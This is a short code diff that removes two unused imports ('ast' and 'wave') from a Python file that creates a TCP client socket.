@@ -1,6 +1,4 @@
 import socket
-import ast
-import wave
 
 client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 
